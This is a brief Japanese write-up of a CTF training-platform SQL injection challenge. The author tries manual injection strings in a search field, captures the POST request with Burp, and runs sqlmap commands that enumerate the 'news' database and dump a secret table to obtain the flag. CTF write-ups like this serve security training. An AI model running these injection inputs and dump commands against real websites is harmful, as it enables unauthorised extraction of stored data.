- なぜ終了した問題の writeup を書くのか:ある CTF トレーニングプラットフォームの問題を解いているからです
まず、ウェブサイトを開きます。検索画面が表示されますが、何も反応がありません:
インジェクションができるか試してみます:
- a':空白の画面
- a and 1=1:何も返されません
- a and 1=1 and '%'='%:何も返されません
インジェクションできるものはなさそうです。パケットを見てみましょう、Burp を使用して送信された POST リクエストです:
それでは、1.txt として保存し、sqlmap を実行します:
python sqlmap.py -r 1.txt -p search --dbs
python sqlmap.py -r 1.txt -p search -D news --tables
python sqlmap.py -r 1.txt -p search -D news -T secret_table --columns
python sqlmap.py -r 1.txt -p search -D news -T secret_table -C "fl4g,id" --dump
フラグを取得しました:QCTF{sq1_inJec7ion_ezzz}